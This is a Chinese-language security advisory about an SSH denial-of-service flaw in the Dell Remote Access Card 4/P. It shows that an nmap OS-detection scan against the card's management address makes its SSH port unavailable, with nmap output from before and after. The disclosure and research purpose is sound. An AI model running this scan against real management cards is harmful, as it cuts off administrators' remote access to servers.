安全研究
安全漏洞
Dell远程访问卡SSH远程拒绝服务漏洞
发布日期:2007-08-13
更新日期:2007-08-14
受影响系统:
Dell Remote Access Card 4/P 1.50 (build 02.16)描述:
BUGTRAQ ID: 25291
Dell远程访问卡(DRAC)允许用户远程管理服务器。
DRAC的SSH服务在处理畸形的数据连接时存在漏洞,远程攻击者可能利用此漏洞导致SSH服务不可用。
如果使用Debian unstable或Ubuntu Depper所捆绑的nmap-4.03-3端口扫描工具对Dell远程访问卡的SSH服务执行端口扫描的话,就可能导致SSH端口不可用,必须使用racadm工具硬重启整个系统才能恢复。
<*来源:Robert Scheck (scheck@etes.de)
链接:http://marc.info/?l=full-disclosure&m=118703125510222&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ nmap -sV [Management IPv4 address of DRAC4]
Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:54 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh Mocanada embedded SSH (protocol 2.0)
80/tcp open http Dell Embedded Remote Access card webserver 1.0
443/tcp open ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open vnc?
Service Info: Devices: terminal server, remote management
Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$
以下命令可关闭DRAC4上所运行的SSH守护程序:
$ nmap -O [Management IPv4 address of DRAC4]
Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-07-09 14:55
CEST
Insufficient responses for TCP sequencing (0), OS detection may be less
accurate
Insufficient responses for TCP sequencing (0), OS detection may be less
accurate
Insufficient responses for TCP sequencing (0), OS detection may be less
accurate
Interesting ports on xxx.xxx.xxx.xxx:
(The 1670 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
5900/tcp open vnc
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi).
Nmap finished: 1 IP address (1 host up) scanned in 65.943 seconds
$
这时SSH端口不再可用,通过OpenSSH客户端创建SSH连接会超时:
$ nmap -sV [Management IPv4 address of DRAC4]
Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:56 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Dell Embedded Remote Access card webserver 1.0
443/tcp open ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open vnc?
Service Info: Devices: terminal server, remote management
Nmap finished: 1 IP address (1 host up) scanned in 21.378 seconds
$
建议:
厂商补丁:
Dell
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dell.com/
浏览次数:3497
严重程度:0(网友投票)
绿盟科技给您安全的保障